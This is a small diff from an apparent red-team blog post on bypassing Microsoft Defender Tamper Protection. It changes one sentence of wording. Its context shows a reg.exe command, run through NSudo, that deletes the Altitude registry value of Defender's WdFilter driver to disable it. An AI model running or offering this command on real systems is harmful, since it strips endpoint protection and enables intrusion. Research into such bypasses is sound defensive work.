m3rcer/m3rcer.github.io/_posts/redteaming/Bypass-Tamper-Protection/2024-04-10-Disable_Tamper_Protection_Bypass.md

 [snip]
 ```

-Upon attempting to execute the reg.exe command to delete the "Altitude number" associated with the WdFilter driver, it was confirmed that the operation was successful.
+Upon attempting to execute the reg.exe command to delete the "Altitude number" regkey associated with the WdFilter driver, it was confirmed that the operation was successful.

 ```
 C:\Tools\NSudo_8.2_All_Components\NSudo Launcher\x64> reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter\Instances\WdFilter Instance" /v Altitude /f